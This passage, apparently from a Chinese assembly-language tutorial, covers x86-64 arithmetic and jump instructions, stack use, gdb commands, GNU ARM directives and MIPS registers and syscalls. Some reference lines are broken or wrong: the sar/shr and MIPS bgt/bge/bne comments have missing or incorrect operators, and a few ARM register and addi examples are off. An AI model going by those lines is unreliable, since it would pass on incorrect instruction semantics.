二进制的运算一般是两个参数, 其中第二个参数既是我们指令运算的来源, 也是去路的来源, 就是说我们把运算结果存在第二个参数里. 我们的第一个参数可以是立即数常数, 寄存器或者内存单元. 第二个参数必须是寄存器或者内存. 这两个参数中, 最多只有一个参数是内存单元, 当然也有的指令只有一个参数, 这个参数既是我们运算数据的来源, 也是我们运算数据的去路, 它可以是寄存器或者内存. 这个我们上一节讲了, 这里回顾一下. 许多算术指令用于有符号和无符号类型,也就是带符号加法和无符号加法都使用相同的指令. 当需要的时候, 参数设置的条件代码可以用来检测不同类型的溢出.
add src, dst ;dst = dst + src
sub src, dst ;dst = dst - src
imul src, dst ;dst = dst * src
neg dst ;dst = -dst ( 算术取反 )
and src, dst ;dst = dst & src
or src, dst ;dst = dst | src
xor src, dst ;dst = dst ^ src
not dst ;dst = ~dst ( 按位取反 )
shl count, dst ;dst <<= count ( 按 count 的值来左移 ), 跟这个相同的是`sal`指令
sar count, dst ;dst = count ( 按 count 的值来算术右移 )
shr count, dst ;dst = count ( 按 count 的值来逻辑右移 )
;某些指令有特殊情况变体, 这些变体有不同的参数
imul src ;一个参数的 imul 指令假定 %rax 中其他参数计算 128 位的结果, 在 %rdx 中存储高 64 位, 在 %rax 中存储低 64 位.
shl dst ;dst <<= 1 ( 后面没有 count 参数的时候默认是移动 1 位, `sar`, `shr`, `sal` 指令也是一样 )
这些指令上一节都讲过, 这里稍微提一下.
流程控制指令
有一个特殊的 %eflags 寄存器, 它存着一组被称为条件代码的布尔标志. 大多数的算术运算会更新这些条件代码. 条件跳转指令读取这些条件代码之后, 再确定是否执行相应的分支指令. 条件代码包括 ZF( 零标志 ), SF( 符号标志 ), OF( 溢出标志, 有符号 ) 和 CF( 进位标志, 无符号 ). 例如, 如果结果为 0 , 则设置 ZF, 如果操作溢出 ( 进入符号位 ), 则设置 OF.
这些指令一般是先执行 cmp
或 test
操作来设置标志, 然后再跟跳转指令变量, 该变量读取标志来确定是采用分支代码还是继续下一条代码. cmp
或 test
的参数是立即数, 寄存器或者内存单元 ( 最多只有一个内存参数 ). 条件跳转有 32 中变体, 其中几种效果是一样的. 下面是一些分支指令.
cmpl op2, op1 ;运算结果 = op1 - op2, 丢弃结果然后设置条件代码
test op2, op1 ;运算结果 = op1 & op2, 丢弃结果然后设置条件代码
jmp target ;无条件跳跃
je target ;等于时跳跃, 和它相同的还有 jz, 即jump zero ( ZF = 1 )
jne target ;不相等时跳跃, 和它相同的还有 jnz, 即 jump non zero ( ZF = 0 )
jl target ;小于时跳跃, 和它相同的还有 jnge, 即 jump not greater or equal ( SF != OF )
jle target ;小于等于时跳跃, 和它相同的还有 jng, 即 jump not greater ( ZF = 1 or SF != OF )
jg target ;大于时跳跃, 和它相同的还有 jnle, 即 jump not less or equal ( ZF = 0 and SF = OF )
jge target ;大于等于时跳跃, 和它相同的还有 jnl, 即 jump not less ( SF = OF )
ja target ;跳到上面, 和它相同的还有 jnbe, 即 jump not below or equal ( CF = 0 and ZF = 0 )
jb target ;跳到下面, 和它相同的还有 jnae, 即 jump not above or equal ( CF = 1 )
js target ;SF = 1 时跳跃
jns target ;SF = 0 时跳跃
其实你也会发现这里大部分上一节都讲过, 这里我们可以再来一遍巩固一下.
setx
和movx
还有两个指令家族可以 读取/响应 当前的条件代码. setx
指令根据条件 x 的状态将目标寄存器设置为 0 或 1. cmovx
指令根据条件 x 是否成立来有条件地执行 mov. x 是任何条件变量的占位符, 就是说 x 可以用这些来代替 : e, ne, s, ns. 它们的意思上面也都说过了.
sete dst ;根据 零/相等( zero/equal ) 条件来把 dst 设置成 0 或 1
setge dst ;根据 大于/相等( greater/equal ) 条件来把 dst 设置成 0 或 1
cmovns src, dst ;如果 ns 条件成立, 则继续执行 mov
cmovle src, dst ;如果 le 条件成立, 则继续执行 mov
对于 setx
指令, 其目标必须是单字节寄存器 ( 例如 %al 用于 %rax 的低字节 ). 对于 cmovx
指令, 其来源和去路都必须是寄存器.
函数调用与栈
%rsp 寄存器用作 " 栈指针 "; push
和 pop
用于添加或者删除栈内存中的值. push
指令只有一个参数, 这个参数是立即数常数, 寄存器或内存单元. push
指令先把 %rsp 的值递减, 然后将参数复制到栈内存上的 tompost. pop
指令也只有一个参数, 即目标寄存器. pop
先把栈内存最顶层的值复制到目标寄存器, 然后把 %rsp 递增. 直接调整 %rsp, 以通过单个参数添加或删除整个数组或变量集合也是可以的. 但注意, 栈内存是朝下增长 ( 即朝向较低地址 ).
push %rbx ;把 %rbx 入栈
pushq $0x3 ;把立即数 3 入栈
sub $0x10, %rsp ;调整栈指针以空出 16 字节
pop %rax ;把栈中最顶层的值出栈到寄存器 %rax 中
add $0x10, %rsp ;调整栈指针以删除最顶层的 16 个字节
函数之间是通过互相调用返回来互相控制的. callq
指令有一个参数, 即被调用的函数的地址. 它将返回来的地址入栈, 这个返回来的地址即 %rip 当前的值, 也即是调用函数后的下一条指令. 然后这个指令让程序跳转到被调用的函数的地址. retq
指令把刚才入栈的地址给出栈, 让它回到 %rip 中, 从而让程序在保存的返回地址处重新开始, 就是说你中途跳到别的地方去, 你回来的时候要从你跳的那个地方重新开始.
当然, 你如果要设置这种函数间的互相调用, 调用者需要将前六个参数放入寄存器 %rdi, %rsi, %rdx, %rcx, %r8 和 %r9 ( 任何其它参数都入栈 ), 然后再执行调用指令.
mov $0x3, %rdi ;第一个参数在 %rdi 中
mov $0x7, %rsi ;第二个参数在 %rsi 中
callq binky ;把程序交给 binky 控制
当被调用者那个函数完事的时候, 这个函数将返回值 ( 如果有的话 ) 写入 %rax, 然后清理栈内存, 并使用 retq
指令把程序控制权交还给调用者.
mov $0x0, %eax ;将返回值写入 %rax
add $0x10, %rsp ;清理栈内存
retq ;交还控制权, 跳回去
这些分支跳转指令的目标通常是在编译时确定的绝对地址. 但是, 有些情况下直到运行程序的时候, 我们才知道目标的绝对内存地址. 例如编译为跳转表的 switch 语句或调用函数指针时. 对于这些, 我们先计算目标地址, 然后把地址存到寄存器中, 然后用 分支/调用( branch/call ) 变量 je *%rax
或 callq *%rax
从指定寄存器中读取目标地址.
当然还有更简单的方法, 就是上一节讲的打标签.
3.4.5 汇编和 gdb
调试器 ( debugger ) 有许多功能, 这可以让你可以在程序中追踪和调试代码. 你可以通过在其名称上加个 $ 来打印寄存器中的值, 或者使用命令 info reg 转储所有寄存器的值 :
(gdb) p $rsp
(gdb) info reg
disassemble
命令按照名称打印函数的反汇编. x
命令支持 i 格式, 这个格式把内存地址的内容解释为编码指令 ( 解码 ).
(gdb) disassemble main //反汇编, 然后打印所有 main 函数的指令
(gdb) x/8i main //反汇编, 然后打印开始的 8 条指令
你可以通过在函数中的直接地址或偏移量为特定汇编指令设置断点.
(gdb) b *0x08048375
(gdb) b *main+7 //在 main+7个字节这里设置断点
你可以用 stepi
和 nexti
命令来让程序通过指令 ( 而不是源代码 ) 往前执行.
(gdb) stepi
(gdb) nexti
3.5 ARM汇编基础
3.5.1 引言
本章所讲述的是在 GNU 汇编程序下的 ARM 汇编快速指南,而所有的代码示例都会采用下面的结构:
[< 标签 label :] {<指令 instruction or directive } @ 注释 comment
在 GNU 程序中不需要缩进指令。程序的标签是由冒号识别而与所处的位置无关。 就通过一个简单的程序来介绍:
.section .text, "x"
.global add @给符号添加外部链接
add:
ADD r0, r0, r1 @添加输入参数
MOV pc, lr @从子程序返回
@程序结束
它定义的是一个返回总和函数 “ add ”,允许两个输入参数。通过了解这个程序实例,想必接下来这类程序的理解我们也能够很好的的掌握。
3.5.2 ARM 的 GNU 汇编程序指令表
在 GNU 汇编程序下的 ARM 指令集涵括如下:
GUN 汇编程序指令 | 描述 |
---|---|
.ascii "<string>" | 将字符串作为数据插入到程序中 |
.asciz "<string>" | 与 .ascii 类似,但跟随字符串的零字节 |
.balign <power_of_2> {,<fill_value>{,<max_padding>} } | 将地址与 <power_of_2> 字节对齐。 汇编程序通过添加值 <fill_value> 的字节或合适的默认值来对齐. 如果需要超过 <max_padding> 这个数字来填充字节,则不会发生对齐( 类似于armasm 中的 ALIGN ) |
.byte <byte1> {,<byte2> } … | 将一个字节值列表作为数据插入到程序中 |
.code <number_of_bits> | 以位为单位设置指令宽度。 使用 16 表示 Thumb,32 表示 ARM 程序( 类似于 armasm 中的 CODE16 和 CODE32 ) |
.else | 与.if和 .endif 一起使用( 类似于 armasm 中的 ELSE ) |
.end | 标记程序文件的结尾( 通常省略 ) |
.endif | 结束条件编译代码块 - 参见.if,.ifdef,.ifndef( 类似于 armasm 中的 ENDIF ) |
.endm | 结束宏定义 - 请参阅 .macro( 类似于 armasm 中的 MEND ) |
.endr | 结束重复循环 - 参见 .rept 和 .irp(类似于 armasm 中的 WEND ) |
.equ <symbol name>, <vallue> | 该指令设置符号的值( 类似于 armasm 中的 EQU ) |
.err | 这个会导致程序停止并出现错误 |
.exitm | 中途退出一个宏 - 参见 .macro( 类似于 armasm 中的 MEXIT ) |
.global <symbol> | 该指令给出符号外部链接( 类似于 armasm 中的 MEXIT )。 |
.hword <short1> {,<short2> }... | 将16位值列表作为数据插入到程序中( 类似于 armasm 中的 DCW ) |
.if <logical_expression> | 把一段代码变成前提条件。 使用 .endif 结束代码块( 类似于 armasm中的 IF )。 另见 .else |
.ifdef <symbol> | 如果定义了 <symbol> ,则包含一段代码。 结束代码块用 .endif, 这就是个条件判断嘛, 很简单的. |
.ifndef <symbol> | 如果未定义 <symbol> ,则包含一段代码。 结束代码块用 .endif, 同上. |
.include "<filename>" | 包括指定的源文件, 类似于 armasm 中的 INCLUDE 或 C 中的#include |
.irp <param> {,<val 1>} {,<val_2>} ... | 为值列表中的每个值重复一次代码块。 使用 .endr 指令标记块的结尾。 在里面重复代码块,使用 \<param> 替换关联的代码块值列表中的值。 |
.macro <name> {<arg_1>} {,< arg_2>} ... {,<arg_N>} | 使用 N 个参数定义名为<name> 的汇编程序宏。宏定义必须以 .endm 结尾。 要在较早的时候从宏中逃脱,请使用 .exitm 。 这些指令是类似于 armasm 中的 MACRO,MEND 和MEXIT。 你必须在虚拟宏参数前面加 \ . |
.rept <number_of_times> | 重复给定次数的代码块。 以.endr 结束。 |
<register_name> .req <register_name> | 该指令命名一个寄存器。 它与 armasm 中的 RN 指令类似,不同之处在于您必须在右侧提供名称而不是数字(例如,acc .req r0 ) |
.section <section_name> {,"<flags> "} | 启动新的代码或数据部分。 GNU 中有这些部分:.text 代码部分;.data 初始化数据部分和.bss 未初始化数据部分。 这些部分有默认值flags和链接器理解默认名称(与armasm指令AREA类似的指令)。 以下是 ELF 格式文件允许的 .section标志: a 表示 allowable section w 表示 writable section x 表示 executable section |
.set <variable_name>, <variable_value> | 该指令设置变量的值。 它类似于 SETA。 |
.space <number_of_bytes> {,<fill_byte> } | 保留给定的字节数。 如果指定了字节,则填充零或 <fill_byte> (类似于 armasm 中的 SPACE) |
.word <word1> {,<word2>}... | 将 32 位字值列表作为数据插入到程序集中(类似于 armasm 中的 DCD)。 |
3.5.3 寄存器名称
通用寄存器:
%r0 - %r15
fp 寄存器:
%f0 - %f7
临时寄存器:
%r0 - %r3, %r12
保存寄存器:
%r4 - %r10
堆栈 ptr 寄存器:
%sp
帧 ptr 寄存器:
%fp
链接寄存器:
%lr
程序计数器:
%ip
状态寄存器:
$psw
状态标志寄存器:
xPSR
xPSR_all
xPSR_f
xPSR_x
xPSR_ctl
xPSR_fs
xPSR_fx
xPSR_fc
xPSR_cs
xPSR_cf
xPSR_cx
3.5.4 汇编程序特殊字符/语法
内联评论字符: '@'
行评论字符: '#'
语句分隔符: ';'
立即操作数前缀: '#' 或 '$'
3.5.5 arm程序调用标准
参数寄存器 :%a0 - %a4(别名为%r0 - %r4)
返回值regs :%v1 - %v6(别名为%r4 - %r9)
3.5.6 寻址模式
addr
绝对寻址模式
%rn
寄存器直接寻址
[%rn]
寄存器间接寻址或索引
[%rn,#n]
基于寄存器的偏移量
上述 "rn" 指任意寄存器,但不包括控制寄存器。
3.5.7 机器相关指令
指令 | 描述 |
---|---|
.arm | 使用arm模式进行装配 |
.thumb | 使用thumb模式进行装配 |
.code16 | 使用thumb模式进行装配 |
.code32 | 使用arm模式进行组装 |
.force_thumb Force | thumb模式(即使不支持) |
.thumb_func | 将输入点标记为thumb编码(强制bx条目) |
.ltorg | 启动一个新的文字池 |
3.6 MIPS汇编基础
数据类型和常量
- 数据类型:
- 指令全是32位
- 字节(8位),半字(2字节),字(4字节)
- 一个字符需要1个字节的存储空间
- 整数需要1个字(4个字节)的存储空间
- 常量:
- 按原样输入的数字。例如 4
- 用单引号括起来的字符。例如 'b'
- 用双引号括起来的字符串。例如 “A string”
寄存器
- 32个通用寄存器
- 寄存器前面有 $
两种格式用于寻址:
- 使用寄存器号码,例如
$ 0
到$ 31
- 使用别名,例如
$ t1
,$ sp
- 特殊寄存器 Lo 和 Hi 用于存储乘法和除法的结果
- 不能直接寻址; 使用特殊指令
mfhi
( “ 从 Hi 移动 ” )和mflo
( “ 从 Lo 移动 ” )访问的内容
- 不能直接寻址; 使用特殊指令
- 栈从高到低增长
寄存器 | 别名 | 用途 |
---|---|---|
$0 | $zero | 常量0(constant value 0) |
$1 | $at | 保留给汇编器(Reserved for assembler) |
$2-$3 | $v0-$v1 | 函数调用返回值(values for results and expression evaluation) |
$4-$7 | $a0-$a3 | 函数调用参数(arguments) |
$8-$15 | $t0-$t7 | 暂时的(或随便用的) |
$16-$23 | $s0-$s7 | 保存的(或如果用,需要SAVE/RESTORE的)(saved) |
$24-$25 | $t8-$t9 | 暂时的(或随便用的) |
$26~$27 | $k0~$k1 | 保留供中断/陷阱处理程序使用 |
$28 | $gp | 全局指针(Global Pointer) |
$29 | $sp | 堆栈指针(Stack Pointer) |
$30 | $fp | 帧指针(Frame Pointer) |
$31 | $ra | 返回地址(return address) |
再来说一说这些寄存器 :
- zero 它一般作为源寄存器,读它永远返回 0,也可以将它作为目的寄存器写数据,但效果等于白写。为什么单独拉一个寄存器出来返回一个数字呢?答案是为了效率,MIPS 的设计者只允许在寄存器内执行算术操作,而不允许直接操作立即数。所以对最常用的数字 0 单独留了一个寄存器,以提高效率
- at 该寄存器为给编译器保留,用于处理在加载 16 位以上的大常数时使用,编译器或汇编程序需要把大常数拆开,然后重新组合到寄存器里。系统程序员也可以显式的使用这个寄存器,有一个汇编 directive 可被用来禁止汇编器在 directive 之后再使用 at 寄存器。
- v0, v1.这两个很简单,用做函数的返回值,大部分时候,使用 v0 就够了。如果返回值的大小超过 8 字节,那就需要分配使用堆栈,调用者在堆栈里分配一个匿名的结构,设置一个指向该参数的指针,返回时 v0 指向这个对应的结构,这些都是由编译器自动完成。
- a0-a3. 用来传递函数入参给子函数。看一下这个例子:
ret = strncmp("bear","bearer",4)
参数少于 16 字节,可以放入寄存器中,在 strncmp 的函数里,a0 存放的是 "bear" 这个字符串所在的只读区地址,a1 是 "bearer" 的地址,a2 是 4. - t0-t9 临时寄存器 s0-s8 保留寄存器 这两种寄存器需要放在一起说,它们是 mips 汇编里面代码里见到的最多的两种寄存器,它们的作用都是存取数据,做计算、移位、比较、加载、存储等等,区别在于,t0-t9 在子程序中可以使用其中的值,并不必存储它们,它们很适合用来存放计算表达式时使用的“临时”变量。如果这些变量的使用要要跳转到子函数之前完成,因为子函数里很可能会使用相同的寄存器,而且不会有任何保护。如果子程序里不会调用其它函数那么建议尽量多的使用t0-t9,这样可以避免函数入口处的保存和结束时的恢复。 相反的,s0-s8 在子程序的执行过程中,需要将它们存储在堆栈里,并在子程序结束前恢复。从而在调用函数看来这些寄存器的值没有变化。
- k0, k1. 这两个寄存器是专门预留给异常处理流程中使用。异常处理流程中有什么特别的地方吗?当然。当 MIPS CPU 在任务里运行的时候,一旦有外部中断或者异常发生,CPU 就会立刻跳转到一个固定地址的异常 handler 函数执行,并同时将异常结束后返回到任务的指令地址记录在 EPC 寄存器(Exception Program Counter)里。习惯性的,异常 handler 函数开头总是会保持现场即 MIPS 寄存器到中断栈空间里,而在异常返回前,再把这些寄存器的值恢复回去。那就存在一个问题,这个 EPC 里的值存放在哪里?异常 handler 函数的最后肯定是一句
jr x
,X 是一个 MIPS 寄存器,如果存放在前面提到的 t0,s0 等等,那么 PC 跳回任务执行现场时,这个寄存器里的值就不再是异常发生之前的值。所以必须要有时就可以一句jr k0
指令返回了。 k1 是另外一个专为异常而生的寄存器,它可以用来记录中断嵌套的深度。CPU 在执行任务空间的代码时,k1 就可以置为 0,进入到中断空间,每进入一次就加 1,退出一次相应减 1,这样就可以记录中断嵌套的深度。这个深度在调试问题的时候经常会用到,同时应用程序在做一次事情的时候可能会需要知道当前是在任务还是中断上下文,这时,也可以通过 k1 寄存器是否为 0 来判断。 - sp 指向当前正在操作的堆栈顶部,它指向堆栈中的下一个可写入的单元,如果从栈顶获取一个字节是 sp-1 地址的内容。在有 RTOS 的系统里,每个 task 都有自己的一个堆栈空间和实时 sp 副本,中断也有自己的堆栈空间和 sp 副本,它们会在上下文切换的过程中进行保存和恢复。
- gp 这是一个辅助型的寄存器,其含义较为模糊,MIPS 官方为该寄存器提供了两个用法建议,一种是指向 Linux 应用中位置无关代码之外的数据引用的全局偏移量表; 在运行 RTOS 的小型嵌入式系统中,它可以指向一块访问较为频繁的全局数据区域,由于MIPS 汇编指令长度都是 32bit,指令内部的 offset 为 16bit,且为有符号数,所以能用一条指令以 gp 为基地址访问正负 15bit 的地址空间,提高效率。那么编译器怎么知道gp初始化的值呢?只要在 link 文件中添加 _gp 符号,连接器就会认为这是 gp 的值。我们在上电时,将 _gp 的值赋给 gp 寄存器就行了。 话说回来,这都是 MIPS 设计者的建议,不是强制,楼主还见过一种 gp 寄存器的用法,来在中断和任务切换时做 sp 的存储过渡,也是可以的。
- fp 这个寄存器不同的编译器对其解释不同,GNU MIPS C 编译器使用其作为帧指针,指向堆栈里的过程帧(一个子函数)的第一个字,子函数可以用其做一个偏移访问栈帧里的局部变量,sp 也可以较为灵活的移动,因为在函数退出之前使用 fp 来恢复;还要一种而 SGI 的 C 编译器会将这个寄存器直接作为 s8,扩展了一个保留寄存器给编译器使用。
- ra 在函数调用过程中,保持子函数返回后的指令地址。汇编语句里函数调用的形式为:
jal function_X
这条指令 jal(jump-and-link,跳转并链接) 指令会将当期执行运行指令的地址 +4 存储到 ra 寄存器里,然后跳转到 function_X 的地址处。相应的,子函数返回时,最常见的一条指令就是jr ra
ra 是一个对于调试很有用的寄存器,系统的运行的任何时刻都可以查看它的值以获取 CPU 的运行轨迹。
最后,如果纯写汇编语句的话,这些寄存器当中除了 zero 之外,其它的基本上都可以做普通寄存器存取数据使用(这也是它们为什么会定义为“通用寄存器”,而不像其它的协处理器、或者外设的都是专用寄存器,其在出厂时所有的功能都是定死的),那为什么有这么多规则呢 ?MIPS 开发者们为了让自己的处理器可以运行像 C、Java 这样的高级语言,以及让汇编语言和高级语言可以安全的混合编程而设计的一套 ABI(应用编程接口),不同的编译器的设计者们就会有据可依,系统程序员们在阅读、修改汇编程序的时候也能根据这些约定而更为顺畅地理解汇编代码的含义。
程序结构
- 本质上只是带有数据声明的纯文本文件,程序代码 ( 文件名应以后缀 .s 结尾,或者.asm )
- 数据声明部分后跟程序代码部分
数据声明
- 数据以
.data
为标识 - 声明变量后,即在内存中分配空间
代码
- 放在用汇编指令
.text
标识的文本部分中 - 包含程序代码( 指令 )
- 给定标签
main
代码执行的起点 ( 和 C 语言一样 ) - 程序结束标志(见下面的系统调用)
注释
- # 表示单行注释
# 后面的任何内容都会被视为注释
- MIPS 汇编语言程序的模板:
#给出程序名称和功能描述的注释
#Template.s
#MIPS汇编语言程序的Bare-bones概述
.data #变量声明遵循这一行
#...
.text#指令跟随这一行
main:#表示代码的开始(执行的第一条指令)
#...
#程序结束,之后留空,让SPIM满意.
变量声明
声明格式:
name:storage_type value(s)
使用给定名称和指定值为指定类型的变量创建空间
value (s) 通常给出初始值; 对于.space,给出要分配的空格数
注意:标签后面跟冒号(:)
- 例如
var1:.word 3 #创建一个初始值为 3 的整数变量
array1:.byte'a','b' #创建一个元素初始化的 2 元素字符数组到 a 和 b
array2:.space 40 #分配 40 个连续字节, 未初始化的空间可以用作 40 个元素的字符数组, 或者是
#10 个元素的整数数组.
读取/写入 ( Load/Store )指令
- 对 RAM 的访问, 仅允许使用加载和存储指令 ( 即
load
或者store
) - 所有其他指令都使用寄存器参数
load
:
lw register_destination,RAM_source
#将源内存地址的字 ( 4 个字节 ) 复制到目标寄存器,(lw中的'w'意为'word',即该数据大小为4个字节)
lb register_destination,RAM_source
#将源内存地址的字节复制到目标寄存器的低位字节, 并将符号映射到高位字节 ( 同上, lb 意为 load byte )
store
:
sw register_source,RAM_destination
#将源寄存器的字存储到目标内存RAM中
sb register_source,RAM_destination
#将源寄存器中的低位字节存储到目标内存RAM中
立即加载:
li register_destination,value
#把立即值加载到目标寄存器中,顾名思义, 这里的 li 意为 load immediate, 即立即加载.
- 例子
.data
var1: .word 23 # 给变量 var1 在内存中开辟空间, 变量初始值为 23
.text
__start:
lw $t0, var1 # 将内存单元中的内容加载到寄存器中 $t0: $t0 = var1
li $t1, 5 # $t1 = 5 ("立即加载")
sw $t1, var1 # 把寄存器$t1的内容存到内存中 : var1 = $t1
done
间接和立即寻址
-
仅用于读取和写入指令
*直接给地址:*
la $t0,var1
-
将 var1 的内存地址(可能是程序中定义的标签)复制到寄存器
$t0
中*间接寻址, 地址是寄存器的内容, 类似指针:*
lw $t2,($t0)
- 将
$t0
中包含的 RAM 地址加载到$t2
sw $t2,($t0)
-
将
$t2
寄存器中的字存储到$t0
中包含的地址的 RAM 中*基于偏移量的寻址:*
lw $t2, 4($t0)
- 将内存地址 (
$t0 + 4
) 的字加载到寄存器$t2
中 - “ 4 ” 给出了寄存器
$t0
中地址的偏移量
sw $t2,-12($t0)
-
将寄存器
$t2
中的字放到内存地址($t0 - 12
) -
负偏移也是可以的, 反向漂移方不方 ?
注意:基于偏移量 的寻址特别适用于:
-
数组; 访问元素作为与基址的偏移量
-
栈; 易于访问偏离栈指针或帧指针的元素
-
例子
.data
array1: .space 12 # 定义一个 12字节 长度的数组 array1, 容纳 3个整型
.text
__start: la $t0, array1 # 让 $t0 = 数组首地址
li $t1, 5 # $t1 = 5 ("load immediate")
sw $t1, ($t0) # 数组第一个元素设置为 5; 用的间接寻址; array[0] = $1 = 5
li $t1, 13 # $t1 = 13
sw $t1, 4($t0) # 数组第二个元素设置为 13; array[1] = $1 = 13
#该数组中每个元素地址相距长度就是自身数据类型长度,即4字节, 所以对于array+4就是array[1]
li $t1, -7 # $t1 = -7
sw $t1, 8($t0) # 第三个元素设置为 -7;
#array+8 = (address[array[0])+4)+ 4 = address(array[1]) + 4 = address(array[2])
done
算术指令
- 最多使用3个参数
- 所有操作数都是寄存器; 不能有内存地址的存在
- 操作数大小是字 ( 4个字节 ), 32位 = 4 * 8 bit = 4bytes = 1 word
add $t0,$t1,$t2 # $t0 = $t1 + $t2;添加为带符号(2 的补码)整数
sub $t2,$t3,$t4 # $t2 = $t3 Ð $t4
addi $t2,$t3, 5 # $t2 = $t3 + 5;
addu $t1,$t6,$t7 # $t1 = $t6 + $t7;跟无符号数那样相加
subu $t1,$t6,$t7 # $t1 = $t6 - $t7;跟无符号数那样相减
mult $t3,$t4 # 运算结果存储在hi,lo(hi高位数据, lo地位数据)
div $t5,$t6 # Lo = $t5 / $t6 (整数商)
# Hi = $t5 mod $t6 (求余数)
#商数存放在 lo, 余数存放在 hi
mfhi $t0 # 把特殊寄存器 Hi 的值移动到 $t0 : $t0 = Hi
mflo $t1 # 把特殊寄存器 Lo 的值移动到 $t1: $t1 = Lo
#不能直接获取 hi 或 lo中的值, 需要mfhi, mflo指令传值给寄存器
move $t2,$t3 # $t2 = $t3
流程控制
分支 ( if-else )
- 条件分支的比较内置于指令中
b target #无条件分支,直接到程序标签目标
beq $t0, $t1, target #if $t0 = $ t1, 就跳到目标
blt $t0, $t1, target #if $t0 <$ t1, 就跳到目标
ble $t0, $t1, target #if $t0 <= $ t1, 就跳到目标
bgt $t0, $t1, target #if $t0 $ t1, 就跳到目标
bge $t0, $t1, target #if $t0 = $ t1, 就跳到目标
bne $t0, $t1, target #if $t0 < $t1, 就跳到目标
跳转 ( while, for, goto )
j target #看到就跳, 不用考虑任何条件
jr $t3 #类似相对寻址,跳到该寄存器给出的地址处
子程序调用
子程序调用:“ 跳转和链接 ” 指令
jal sub_label #“跳转和链接”
-
将当前的程序计数器保存到
$ra
中 -
跳转到
sub_label
的程序语句子程序返回:“跳转寄存器”指令
jr $ra #“跳转寄存器”
-
跳转到$ ra中的地址(由jal指令存储)
注意:寄存地址存储在寄存器
$ra
中; 如果子例程将调用其他子例程,或者是递归的,则返回地址应该从$ra
复制到栈以保留它,因为jal
总是将返回地址放在该寄存器中,因此将覆盖之前的值
系统调用和 I / O( 针对 SPIM 模拟器 )
-
通过系统调用实现从输入/输出窗口读取或打印值或字符串,并指示程序结束
-
syscall
-
首先在寄存器
$v0
和$a0 - $a1
中提供适当的值 -
寄存器
$v0
中存储返回的结果值( 如果有的话 )下表列出了可能的 系统调用 服务。
Service 服务 | Code in $v0 对应功能的调用码 | Arguments 所需参数 | Results 返回值 |
---|---|---|---|
print 一个整型数 | $v0 = 1 | $a0 = 要打印的整型数 | |
print 一个浮点数 | $v0 = 2 | $f12 = 要打印的浮点数 | |
print 双精度数 | $v0 = 3 | $f12 = 要打印的双精度数 | |
print 字符串 | $v0 = 4 | $a0 = 要打印的字符串的地址 | |
读取 ( read ) 整型数 | $v0 = 5 | $v0 = 读取的整型数 | |
读取 ( read ) 浮点数 | $v0 = 6 | $v0 = 读取的浮点数 | |
读取 ( read ) 双精度数 | $v0 = 7 | $v0 = 读取的双精度 | |
读取 ( read ) 字符串 | $v0 = 8 | 将读取的字符串地址赋值给 $a0 ; 将读取的字符串长度赋值给 $a1 | |
这个应该和 C 语言的 sbrk() 函数一样 | $v0 = 9 | 需要分配的空间大小(单位目测是字节 bytes) | 将分配好的空间首地址给 $v0 |
exit | $v0 =10 | 这个还要说吗.....= _ = |
-
print_string
即print 字符串
服务期望启动以 null 结尾的字符串。指令.asciiz
创建一个以 null 结尾的字符串。
-
read_int
,read_float
和read_double
服务读取整行输入,包括换行符\n
。-
read_string
服务与 UNIX 库例程 fgets 具有相同的语义。
- 它将最多 n-1 个字符读入缓冲区,并以空字符终止字符串。
- 如果当前行中少于 n-1 个字符,则它会读取并包含换行符,并使用空字符终止该字符串。
- 就是输入过长就截取,过短就这样,最后都要加一个终止符。
-
sbrk
服务将地址返回到包含 n 个附加字节的内存块。这将用于动态内存分配。 -
退出服务使程序停止运行
-
-
例子 : 打印一个存储在 $2 的整型数
li $v0, 1 #声明需要调用的操作代码为 1 ( print_int ), 然后赋值给 $v0
move $a0, $t2 #把这个要打印的整型数赋值给 $a0
syscall #让操作系统执行我们的操作
-
例子 : 读取一个数,并且存储到内存中的 int_value 变量中
li $v0, 5 #声明需要调用的操作代码为 5 ( read_int ), 然后赋值给 $v0 syscall #让操作系统执行我们的操作, 然后 $v0 = 5 sw $v0, int_value #通过写入(store_word)指令 将 $v0 的值(5)存入内存中
-
例子 : 打印一个字符串 ( 这是完整的,其实上面例子都可以直接替换 main: 部分,都能直接运行 )
.data
string1 .asciiz "Print this.\n" # 字符串变量声明
# .asciiz 指令使字符串 null 终止
.text
main: li $v0, 4 # 将适当的系统调用代码加载到寄存器 $v0 中
# 打印字符串, 赋值对应的操作代码 $v0 = 4
la $a0, string1 # 将要打印的字符串地址赋值 $a0 = address(string1)
syscall # 让操作系统执行打印操作
要指示程序结束, 应该退出系统调用, 所以最后一行代码应该是这个 :
li $v0, 10 #对着上面的表, 不用说了吧
syscall # 让操作系统结束这一切吧 !
补充 : MIPS 指令格式
- R格式
6 | 5 | 5 | 5 | 5 | 6 |
---|---|---|---|---|---|
op | rs | rt | rd | shamt | funct |
用处: 寄存器 - 寄存器 ALU 操作 读写专用寄存器
- I格式
6 | 5 | 5 | 16 |
---|---|---|---|
op | rs | rt | 立即数操作 |
用处: 加载/存储 字节,半字,字,双字 条件分支,跳转,跳转并链接寄存器
- J格式
6 | 26 |
---|---|
op | 跳转地址 |
用处: 跳转,跳转并链接 陷阱和从异常中返回
各字段含义: op : 指令基本操作,称为操作码。 rs : 第一个源操作数寄存器。 rt : 第二个源操作数寄存器。 rd : 存放操作结果的目的操作数。 shamt : 位移量; funct : 函数,这个字段选择 op 操作的某个特定变体。
例:
add $t0,$s0,$s1
表示$t0=$s0+$s1
,即 16 号寄存器( s0 ) 的内容和 17 号寄存器 ( s1 ) 的内容相加,结果放到 8 号寄存器 ( t0 )。 指令各字段的十进制表示为:
0 | 16 | 17 | 8 | 0 | 32 |
---|---|---|---|---|---|
op = 0 和 funct = 32 表示这是加法, 16 = $s0
表示第一个源操作数 ( rs ) 在 16 号寄存器里,
17 = $s1
表示第二个源操作数 ( rt ) 在 17 号寄存器里, 8 = $t0
表示目的操作数 ( rd ) 在 8 号寄存器里。 把各字段写成二进制,为:
000000 | 10000 | 10001 | 01000 | 00000 | 100000 |
---|---|---|---|---|---|
这就是上述指令的机器码( machine code ), 可以看出是很有规则性的。
补充 : MIPS 常用指令集
lb/lh/lw : 从存储器中读取一个 byte / half word / word 的数据到寄存器中.
如lb $1, 0($2)
sb/sh/sw : 把一个 byte / half word / word 的数据从寄存器存储到存储器中.
如 sb $1, 0($2)
add/addu : 把两个定点寄存器的内容相加
add $1,$2,$3($1=$2+$3)
; u 为不带符号加
addi/addiu : 把一个寄存器的内容加上一个立即数
add $1,$2,#3($1=$2+3)
